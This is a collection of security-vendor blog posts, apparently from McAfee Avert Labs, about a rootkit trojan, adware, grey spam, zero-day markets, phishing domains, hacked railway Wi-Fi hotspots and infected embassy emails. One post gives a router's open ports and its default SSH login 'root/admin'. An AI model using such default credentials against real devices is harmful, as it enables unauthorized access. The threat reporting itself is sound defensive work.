I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan will first communicate with a remote site, and download packages with instructions on how to behave on the machine. The instructions are XML formatted, like the following excerpt:

This file, was named URLMonitor, and also says to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

• core.101.z.img
• Notifier.104.z.img
• URLNotifier.101.z.imo

Several other xml instruction files are downloaded too:

• bootup.exe.xml
• UrlMonitor.xml

When active, one action is to watch and report machine information and urls visited by the user. Here’s an excerpt of a WireShark network capture:

So, as you can see, very well formatted information, and communication, using XML.

Looks like we are getting into the XML trojans…:)

Are you one of the millions who’s been infected by a bot?

If you have, the FBI wants to hear about it.

The agency has recently launched “Operation Bot Roast” to coordinate and bring more visibility to their efforts to dismantle botnets. As part of the effort, they’re trying to get people who have been infected with bots to file a complaint through their Web site. If you know that you’ve been infected, please go and file a complaint report. Every report helps identify these criminals and bolster the case against them.

(An anti-phishing reminder: The FBI will not contact you online and request your personal information–you must go to them to make the report.)

So if you’ve been infected, you can do your part to make the net a safer place!

Our SiteAdvisor researchers have their own blog. It’s got fascinating content - these guy get to see all the nasties the web has to offer, so they have a fascinating array of videos, images and in-depth analysis of malware and phishing attacks.

Their most recent post is about Hosting Sites being targeted as places to host drive-by exploits. This underscores the trend we’ve been seeing of cybercriminals being on the cutting edge of technological innovations. Whenever there’s something new they can use that makes hiding and distributing their creations easier or more effective, they’ll be on it like rats on a cheetoh.

Be sure to add their blog to your list of sites to check for the latest news on all things web-security related!

A while ago over at Security Insights, McAfee CTO Chris Bolin blogged about grey spam. As far as content-based analysis goes, it is a tricky area for anti-spam vendors.

Mass email can roughly be categorised into three groups:

• Real spam: the dubious pills, the get-rich-quick scams, phishing, etc. Everyone hates that, but if you have a good anti-spam solution in place you should end up seeing a very small percentage of what was sent to you.
• Mass-marketing mail: the kind of stuff your bank sends out to each one of its customers. Some of that is useful; some of it you might not care about. Usually if you ask, your bank will stop emailing you.
• Grey-mail spam: This lies somewhere between the top two. This is the stuff that cannot really be classified as spam. They have valid email addresses and even valid telephone numbers. But it doesn’t matter to you; these emails are just irritating. You really don’t want any of them.

For vendors providing anti-spam solutions, grey mail is a difficult thing to tackle. Any attempt to add too many detection rules risks false positives for good sites like Amazon. It might even place the vendor at risk for legal action from some marketing companies. This makes this form of spam very attractive to many unscrupulous mass-mailing marketeers; they’re willing to run the grey-mail gauntlet.

Don’t get me wrong: I think email marketing has its place and that it can be a very powerful tool, but it should be done ethically. There are many mail-marketing firms that play by the rules, but they can get a bad name because of the bigger group that simply doesn’t care, as long as they can make a few bucks.

To a great extent, remediation for grey spam falls outside the scope of a content-analysis engine. Although the latter can help, it needs input from the customer. Only the cutomer can determine what is unwanted and what is allowed in this case: one person’s spam is another person’s ham. Chris has listed a number of things you can do to protect yourself, but if you are already receiving grey mail, here are two good techniques for combating this:

• Blacklists
• Bayesian

Blacklists: Because grey spam tends to have a defined structure, known sender email addresses, etc., you can use blacklists. These blacklists should be created and updated by the customer and not the vendor.

Bayesian: Spam filtering might be another solution, but the problem is that it needs to be trained correctly. The training itself might be too much work for the ordinary home user. Luckily some email clients do a good job of making it easier for a person to use.

Handling false positives: Normally content rules will receive rigorous testing to avoid false positives. When customers introduce blacklists or Bayesian techniques, they are creating custom content rules. As these rules will be ad-hoc, there is a higher chance for false positives. To help with this issue, some form of quarantine system needs to be introduced. The single person at home or in a small company with fewer than 10 employees might use the rules-and-folders functionality in a decent email client to handcraft a solution. However, for any company with a large number of employees, something more structured is required. McAfee offers the product Quarantine Manager to complement some of its other mail-product offerings.

Expect to read more postings on this topic from some of my colleagues at Avert Labs.

Following up on a tip from my colleagues at McAfee’s SiteAdvisor, I examined an interesting piece of software recently from a provider I’d not heard of before, a product called “MeMe,” made by MeMedia, Inc.

The installation was immediate upon launching the installer, with no EULA or other notification displayed until the software was running. The MeMedia Web site suggests the software is intended to supplement a user’s browsing and general use of the Internet by tracking usage (locally, the software assures) and then proactively searching out and alerting the user to additional content that matches the interest categories that MeMe has identified. The term “meocentrism” is cutely coined on the product’s web site to describe this. I also read a notice that the software may be used “in support of free software,” suggesting potential bundling. Oddly, visiting MeMedia’s home page results only in a page with a logo and “coming soon,” though several subpages are accessible and the software appears to be available and functioning. The interface is designed to resemble a three-dimensional cube, and uses many shadow and animation effects:

Peeking under the hood, I grabbed some of the network traffic to verify that no user-browsing data was in fact being transmitted. I was surprised to find communication with servers in the whenu.com domain, and even parameters being passed in HTTP transmissions such as “&app=whenusave.” Save! (also incarnated as “SaveNow”) is an advertising client product made by WhenU. I did not note any personally identifiable data being transferred to remote systems during a few limited tests, but the indications point to a mechanism similar to what WhenU uses in its advertisment products (running search terms against a local database to preclude the need for sending user data from the local system). It appears that the MeMe software is somehow leveraging WhenU’s infrastructure. Along with many overlapping IP addresses and DNS records, we have indications that MeMedia is in partnership with or wholly owned by WhenU.

Crossing into speculation, I find interesting the apparent repurposing of adware infrastructure as a “usage assistant”; something to help a user find content on general topics of interest rather than simply pushing comparative product offers. The vendor achieves the same goal of connecting a user with specific content; MeMedia could easily define and control the data set that the client software could search to find the user’s identified interests. Vendors could feasibly monetize additions to such a content repository as well as more direct targeted advertising. If my speculation is correct, such a scenario–though not far removed from traditional push-advertising models–might at least be better accepted by users. Although the field of data such a “meocentric” digital helper could sift through might really be a walled garden of sponsored content, the idea seems less intrusive than a pop-up hawking a widget.

On my test environment, which is essentially clean of any usage data, MeMe “found” an article on Michael Vick for me after running for several minutes. This occured even without my doing any browsing or other activity. I later found that several terms were apparently hard coded into the installer package (ExecuteParameters=”/i\”rock;Chicago Bears;Serena Williams;Michael Vick\”"), ensuring that the recipient would at least have some “interests” about which content could be “found” right off the bat.

It’s awfully kind of them to look out for us boring folk. 

In part 1 of this blog series, I presented a definition for zero-day threats. Now that we know what they are, let’s explore how they come to be–why they exist.

Many years ago security researchers discovered vulnerabilities in software and took their findings to the manufacturer, or vendor. Oftentimes they, or their findings, were either ignored or not taken seriously. Out of frustration researchers began seeking other means to have their issues properly addressed, and their voices heard. (For more on this, listen to McAfee’s AudioParasitics podcasts Episode 4 & Episode 5 with special guest Stuart McClure.)

Back then, fighting “for the people” and making software more secure were certainly motivating factors for researchers; and of course notoriety and peer praise played a role.

Nowadays there is another primary motivating factor, money. The rewards range from the few hundred dollars that vendors like Mozilla pay, to the thousand dollars that vendors such as Verisign iDefence, 3com TippingPoint, Digital Armaments and, more recently, Netragard’s Snosoft fork over, to the many thousands of dollars offered by private companies and individuals on the black market.

Charlie Miller recently published a paper entitled The Legitimate Vulnerability Market: Inside the Secretive World of 0-day Exploit Sales describing the challenges of selling vulnerability information.  As discussed in this paper, there are a number of obstacles when trying to line up a buyer, negotiate a fair price, prove the validity of the vulnerability, and close the deal without either party getting burned. Many researchers who are fed up with these problems opt to trade in the currency of fame rather than fortune. Some of these researchers have contributed to various “Month of X Bug” projects, including blogs built for the regular and scheduled disclosure of vulnerabilities. The first few MO_B projects got quite a bit of attention, but now that there have been seven of these projects, they are becoming tiresome.

So why buy a zero-day threat? Research organizations created bounty programs to buy zero-day threats to protect and share the vulnerabilities with their customers, for marketing and press–oh–and to notify the vendor to patch the problem. Private parties must buy them for the same reasons, yes? Wait a moment, private parties have no customers and they don’t want the attention of press. Why would they want the vulnerability patched? That would only devalue the information. What are the remaining reasons for them to purchase these vulnerabilities? To carry out attacks, of course, or to resell the threats. It’s also conceivable that in an age of cyberwarfare, governments may purchase zero days to both remove the threat from the market and to beef up their defenses.

Tune in next week for Zero-Day Threats, Part 3: When & How Are They Released?

At the midyear mark when the sun is at its farthest point north—at least in our hemisphere—it seems appropriate to revisit our predictions for the Top 10 security threats in 2007. Just how good was the McAfee Avert Labs team at reading the tea leaves six months ago?

I conferred with my colleagues in Avert Labs and rounded up the latest data to see if the facts support our prognostications. Let’s revisit our forecast and see how well we did. I decided to score each prediction on a scale of 1 to 5, with 5 being the highest possible score for excellence in crystal ball gazing. (These are in no particular order.)

1. Password-stealing web sites are on the rise.
Score: 5

We continue to see exponential growth in phishing sites. Based on the number of sites blocked by our phishing traps, activity in January alone increased by 358 percent vs. the entire fourth quarter of 2006. February and March rose by at least 200 percent each compared to the same period. In total, the first three months of this year saw a 784 percent increase—with no slowdown in sight.

We also anticipate an increase in the abuse of open-content sites, such as Google and Wiki pages. Google accounts can be used to host drop boxes (via Gmail) or phishing sites (Google Docs). Even Internet archive sites will suffer.

2. Spam, particularly image spam, is on the increase.
Score: 3

The total volume of trap-based spam has stayed fairly flat during the first part of the year. Image spam accounted for to 65 percent of all spam at the beginning of the year and has now declined a bit. Image spam, which has messages embedded in images rather than text (typically pump-and-dump stocks, pharmacy, and degree spam), is still a force to be reckoned with. It hovers between 30 percent to 50 percent of all spam that tries to find its way into users’ inboxes.

3. The popularity of video on the web makes it a target for hackers.
Score: 4

There’s no doubt that hackers are riding the wave of online video available on hugely popular social networking sites like YouTube and MySpace. Astute social engineering— coupled with video’s inherently easy-to-program format—has enabled cybercriminals to come up with a variety of clever tricks. Witness these recent MySpace exploits:

Earlier this year, hackers targeted fans of the French rock band MAMASAID. When fans visited a MySpace account promoting the music group, they’d get a Trojan called JS/SpaceStalk installed on their computers through an insecure feature in QuickTime, HREF Tracks, which allows links to be opened automatically when you run a movie. This link was misused to lure visitors to malicious web sites hosting spyware and other exploit code.

MySpace has also been the target of phishing scams. After gathering MySpace user credentials from phishing sites, spammers log in to accounts and then post spam messages on other accounts. It’s an issue because MySpace can’t close down legitimate user accounts.

4. Mobile phone attacks will become more prevalent.
Score: 0

Surprisingly, mobile malware numbers are down for the first quarter of 2007 (12 attacks), compared to the first quarter of 2006 (47).

5. Adware will go mainstream.
Score: 3

Because adware has gotten such a bad rap, businesses are experimenting with more creative ways to deliver ads on the Internet. BitTorrent is setting a trend by offering free ad-supported downloads rather than paid downloads for its online TV network, so customers see ads before and after watching an episode or a movie—much like traditional television. YuMe Networks is also likely to follow this model.

6. Identity theft and data loss will continue to be a public issue.
Score: 5

According to Attrition’s Data Loss Database—Open Source, more than 13.7 million records have been breached thus far. Compare that to 1.8 million during the same period last year! We maintain our belief that the unauthorized transmission of information will become more of a risk for enterprises. This includes loss of customer data, employee personal information and intellectual property from a variety of channels—applications, networks, and even physical channels, like USB devices, printers, fax and removable storage. If you want to get a more detailed picture of how grave the problem is, take a look at the recent Datamonitor report [“Datagate: The Next Inevitable Corporate Disaster?”] According to the report, more than 60 percent of respondents interviewed experienced data loss within the last year, and an astounding 33 percent believe it could put them out of business!

7. The use of bots will increase.
Score: 3

The statistics from our daily collections show that bots actually declined to a low point in November 2006, but are now increasing again. The numbers aren’t as high as they were 12 months ago, but they’re definitely heading up.

8. Parasitic malware will make a comeback.
Score: 5

There’s no doubt about this one. Philis and Fujacks continue to be active parasitic families, and Avert Labs has classified more than 150 new variants of these two families since 2007. And, let’s not forget other families like Sibil, Grum, and Expiro.

9. The number of rootkits on 32-bit platforms will increase.
Score: 4

According our Virus Tracking Map, approximately 200,000 systems reported rootkit infestations since the beginning of 2007—a 10 percent increase over the first quarter of 2006. (By the way, if you want to check your system, download our free Rootkit Detective. And, of course, VirusScan for Enterprise includes antirootkit technology.)

10. Vulnerabilities will continue to cause concern.
Score: 5

Not only do they continue to cause concern, there are more of them to worry about than ever before. In January and February 2006, Microsoft issued patches for five important and five critical vulnerabilities. During the same months this year, Microsoft patched nine important and 27 critical vulnerabilities.

So, when all is said and done, it looks like our oracles hit the mark in most areas. Stay tuned for a re-evaluation of these trends later this year.

The .at domain registry nic.at have publicly given a green light to phishers to use their top level domain without the fear of their domain name being revoked. nic.at suggest on their recent news article [Translate] that their hands are legally tied when it comes to revoking registrations used solely for fraud. I should note however, they do not support fraudulent activity.

The Spamhaus listing for nic.at is here and I very much doubt this domain has legitimate uses so I’ll happily validate the data Spamhaus presents: for example besthkd was used in a URL similar to the following:
http://ebanking-se[removed]t/folder-name/client-form/form.aspx

However we have lots(!) of samples from some days before the one Spamhaus have recorded for this domain, which raises a question, was this a longer than normal attack?

Looking at our data warehouse I can see lots of samples covering some 6-and-a-bit days! That’s one amazingly long campaign when with professional help brand owners can execute site take-downs in an average 6 hours or so. There has been some growth of phishing attacks recently as I’m sure you’re all aware but this “we’re frightened about liability” behaviour is very disappointing.

Common sense needs to prevail!

In fact, I’m reminded of the 2 laws of sudo

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these two things:

#1) Respect the privacy of others.
#2) Think before you type.

…and they are in that order for a reason!

I would like to respectfully suggest the following: Since your contract is with the owner of the domain that you ensure that contract can be broken in exceptional circumstances. I’m not sure I know of anywhere where fraud is not a crime, so that’s another basis you can act upon.
Spamhaus gives good advice on their listing too:

Nic.at needs to urgently set up communication channels with the
various professional investigators who are investigating phishing:
and of course to review their policies on not taking down domains
being used for phishing.

You can read a full rundown by David Goldstein here.

Sorry for ranting, but in the wise (although edited!) words of Schalk “If you stir the poop and it smells bad people do something about it.“.

The last word: nic.at, you are part of the problem. Grow some balls and “Respect the privacy of others”.

In a recent press event in San Francisco my colleague Craig Schmugar revisited our predictions for the Top 10 security trends of 2007. Among other remarks he said that online criminals are looking for new areas to exploit–such as municipal Wi-Fi–but added we haven’t heard of any real-world attacks.

Meanwhile security professional Dave Whitelegg in his blog writes about the possible appearance of Wi-Fi botnets in the near future.

Looks like Whitelegg hit the target: If you are travelling in France and envisage connecting your computer to some available wireless networks, you might be surprised. Last week in Paris’ Gare du Nord (the Eurostar train station), we saw some unexpected hotspot names.

I found this screenshot on two French blogs (here and here). You don’t need to speak French to notice a few curious names. Undoubtedly the hotspots were hacked and renamed.

Given these particular names, it’s hard to imagine a professional phishing or “man-in-the-middle” attack. We seem to have just childish behaviour. One inquisitive investigator (nicknamed Redeye) searched the origin of this phenomenon. He found a vulnerable SNCF router. (SNCF is the French National Railway Company.) According to his inquiry, the router was just badly configured:

• Opened ports :
• 22 (ssh with default login and password: root/admin)
• 53
• 80
• 443
• 448
• 8080
• 8081
• 8082
• A nmap log indicated the MAC address.

This setup was so insecure that it was possible to access the admin router page!

I also have heard rumours of fake free Wi-Fi access appearing here and there. People would be prompted to use these lure networks; then they would be trapped and their data stolen.

Is this phishing or botnet? Fun or fraud? I don’t know, but in the near future, wireless networks will be a new target. Today young hackers are playing with this; tomorrow cybercriminals will take over from them. We must be vigilant: Check and double-check if we are normally connected to an accurate Access Point instead of to any one-to-one or ad-hoc mode. I also recommend that you systematically use a VPN (virtual private network) client to create a secure tunnel between you and Internet.

Relations between the United States and Russia have been a bit testy of late, but is that any reason for those interested in the U.S. perspective to start receiving virus-laden e-mails? Yes, you read that right.

At the United States Moscow Embassy Web site, we signed up anonymously at the “Information Resource Center” over the course of several months with two unique addresses. Both times, we received e-mails containing the W32/Stration.dr virus.

This could indicate a number of things. At minimum, the e-mail addresses submitted to moscow.usembassy.gov are not secure. It could be that some information (specifically e-mail addresses) is insecure or accessible by an outside party, or it could be that someone with access to this list is infected with a virus. To be clear, we don’t think the U.S. government is deliberately sending infected e-mails. But the fact that this occurred to two separate e-mail accounts submitted on two separate occasions does make it unlikely that this is a fluke.

Tom Goetz, the engineer who handles SiteAdvisor’s e-mail testing, is the one who noticed this nugget of data among the many millions of e-mail tests we’ve run. This is the first dot gov Web site that McAfee has rated “red.” Tom notes that we started scanning test-generated e-mail for viruses about 10 months ago. During that period, we found 17,434 infected e-mails–out of the roughly 18 million we received over the last 12 months. That’s about one-tenth of a percent.

The e-mails were part of a mailing list that included things such as press releases. Maybe someone at the State Department just doesn’t like journalists. Or maybe the United States is the new proxy in Estonia’s cyberwar with Russia.

Whatever the cause, we’ve alerted the proper authorities.